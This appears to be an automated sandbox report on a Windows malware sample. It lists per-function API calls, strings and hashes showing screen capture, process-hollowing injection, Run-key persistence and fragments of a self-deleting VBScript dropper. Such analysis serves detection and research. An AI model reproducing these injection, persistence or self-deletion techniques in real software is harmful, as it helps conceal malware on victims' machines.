                                                                                                                                                                                                                                                                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                                                                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                                                                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                                                                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                                                                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                                                                                                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                                                                                                                                                                                                • String ID: DISPLAY
                                                                                                                                                                                                                                                                                                • API String ID: 1765752176-865373369
                                                                                                                                                                                                                                                                                                • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                                                                                                                                                                                                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                                                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                                                                                                                                                                                                • API String ID: 4188446516-108836778
                                                                                                                                                                                                                                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                                                                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                                                                                • API String ID: 4250697656-2665858469
                                                                                                                                                                                                                                                                                                • Opcode ID: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                                                                                                                                                                                                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                • API String ID: 1861856835-3168347843
                                                                                                                                                                                                                                                                                                • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                                                                                                                                                                                                                                                                • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
